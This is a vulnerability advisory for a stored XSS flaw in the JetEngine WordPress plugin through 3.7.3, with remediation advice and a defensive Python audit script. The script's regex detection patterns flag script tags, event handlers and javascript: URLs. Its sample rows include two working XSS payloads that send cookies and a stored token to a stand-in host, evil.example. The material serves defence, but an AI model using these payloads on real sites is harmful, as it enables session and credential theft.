CVSS Vector (NVD)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Description (NVD)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Stored XSS. This issue affects JetEngine: from n/a through <= 3.7.3.
Analysis (AI)
Stored XSS in the Crocoblock JetEngine WordPress plugin, versions 3.7.3 and earlier, allows an authenticated user with low privileges (PR:L) to store a script payload that later executes in the browsers of other users who view the affected page, including administrators. The vector requires user interaction (UI:R: a victim has to load the page) and rates the impact on confidentiality, integrity and availability as low (C:L/I:L/A:L), but with scope changed (S:C), because the payload runs in the victim's browser rather than in the plugin's own security context. With EPSS at 0.07% and no KEV entry indicating exploitation in the wild, this is a low-probability but real risk; sites where several authenticated roles share the dashboard should patch.
Technical Context (AI)
JetEngine is a Crocoblock WordPress plugin for building dynamic content (custom post types, meta fields, listings and similar elements). The vulnerability is a CWE-79 flaw: user-supplied input is stored and later placed into generated HTML without escaping appropriate to that context. The CVSS vector gives a network attack vector with low complexity and low privileges required, meaning a low-privileged authenticated account is enough; the advisory does not say which role or which input field. That matters in WordPress specifically: core runs post content from accounts without the unfiltered_html capability (Contributors and Authors on a single-site install) through KSES filtering, so a stored XSS reachable at PR:L implies the plugin accepts and re-renders input through its own path without equivalent escaping. Because the payload is stored, it fires on every subsequent view of the affected page until it is removed, which makes it dangerous on sites where low-privileged accounts and administrators share the editing environment.
Affected Products (AI)
Crocoblock JetEngine WordPress plugin, from the earliest release ("n/a" in the advisory) through 3.7.3 inclusive. The plugin is tracked in the Patchstack database under wordpress-jetengine-plugin. Every installation running 3.7.3 or earlier is vulnerable; check the installed version on the Plugins screen in wp-admin, or with WP-CLI via `wp plugin get jet-engine --field=version` (the slug jet-engine is the one given in the NVD description).
Remediation (AI)
Update JetEngine to a release later than 3.7.3. The Patchstack entry gives the affected range as through 3.7.3, so the fix is in a subsequent release; confirm the exact version in the official Crocoblock JetEngine changelog, since this page does not name it. Until the update is applied, limit Contributor, Author and Editor accounts to trusted people (PR:L means a low-privileged account is sufficient), route content from those accounts through administrative review before it goes live, and audit existing post content and meta for script tags, inline event handlers and javascript: URLs, using a scanner such as Wordfence or a direct database query. Two caveats: restricting roles reduces but does not remove exposure, because any low-privileged account, including one obtained through open registration or credential theft, is a foothold; and updating the plugin does not delete payloads that are already stored, so remove whatever the audit finds as well.
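The two checks above (confirm the installed version is inside the affected range, then audit stored content for injected active markup) as an added Python example. This is not JetEngine, Crocoblock or Patchstack code: the sample rows, the author logins and the evil.example host are constructed for the example, and the table names are the standard WordPress wp_posts / wp_postmeta with the default prefix. The version check is a plain numeric compare against the advisory's upper bound, not PHP's version_compare().

```python
import re

# Affected range from the advisory: every release through 3.7.3 inclusive.
LAST_AFFECTED_VERSION = "3.7.3"


def parse_version(v: str) -> tuple:
    """Turn '3.7.3', '3.8.0' or '3.8.0-beta1' into a comparable tuple of ints.

    Pre-release suffixes are dropped and trailing zeros removed so that
    3.8.0 == 3.8. Plain numeric compare, not PHP's version_compare().
    """
    m = re.match(r"\d+(?:\.\d+)*", v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    parts = [int(x) for x in m.group(0).split(".")]
    while len(parts) > 1 and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def is_affected(installed: str) -> bool:
    """True when the installed JetEngine version falls inside the advisory's range.

    This only answers 'is it <= 3.7.3'; the patched release number is not
    named on the page, so it is deliberately not hard-coded here.
    """
    return parse_version(installed) <= parse_version(LAST_AFFECTED_VERSION)


# Heuristic indicators of injected active content in stored HTML. They catch
# the plain payload shapes, not encoded or split variants, so a hit is a lead
# for manual review and a clean run is not proof of absence.
XSS_INDICATORS = [
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    ("inline event handler", re.compile(r"<[^>]+\son[a-z]+\s*=", re.I)),
    ("javascript: URL", re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.I)),
    ("data: URL carrying HTML/JS", re.compile(r"(?:href|src)\s*=\s*['\"]?\s*data:text/(?:html|javascript)", re.I)),
    ("svg/iframe/object/embed element", re.compile(r"<\s*(?:svg|iframe|object|embed)\b", re.I)),
]

# Constructed sample rows standing in for wp_posts.post_content and
# wp_postmeta.meta_value. Author logins and evil.example are made up.
SAMPLE_ROWS = [
    ("wp_posts", 101, "editor_alice", "<p>Quarterly report is live.</p>"),
    ("wp_posts", 102, "contrib_bob",
     '<p>Hi</p><script>fetch("https://evil.example/c?c=" + document.cookie)</script>'),
    ("wp_postmeta", 5531, "contrib_bob",
     "<img src=x onerror=\"new Image().src='https://evil.example/?k=' + localStorage.getItem('token')\">"),
    ("wp_postmeta", 5532, "author_carol", '<a href="javascript:void(0)">menu</a>'),
]


def audit_rows(rows):
    """Scan (table, row_id, author_login, html) tuples; one finding per indicator hit."""
    findings = []
    for table, row_id, author, html in rows:
        for label, rx in XSS_INDICATORS:
            m = rx.search(html)
            if m:
                start = max(0, m.start() - 20)
                findings.append({
                    "table": table,
                    "id": row_id,
                    "author": author,
                    "indicator": label,
                    "snippet": html[start:m.end() + 40],
                })
    return findings


def suspicious_authors(findings) -> list:
    """Accounts whose stored content triggered an indicator: the first place to
    look when deciding which low-privileged accounts to restrict or suspend."""
    return sorted({f["author"] for f in findings})


if __name__ == "__main__":
    for v in ("3.7.3", "3.7.4"):
        print(f"JetEngine {v}: {'AFFECTED' if is_affected(v) else 'outside affected range'}")
    for f in audit_rows(SAMPLE_ROWS):
        print(f"{f['table']}#{f['id']} by {f['author']}: {f['indicator']} -> {f['snippet']!r}")
    print("review accounts:", suspicious_authors(audit_rows(SAMPLE_ROWS)))
```

Feed audit_rows() real rows pulled with `wp db query` or from a database dump; that wiring is left out so the block runs offline. Point it at any table JetEngine itself writes to as well as wp_posts and wp_postmeta, since a plugin-specific field is the likeliest place for the stored payload.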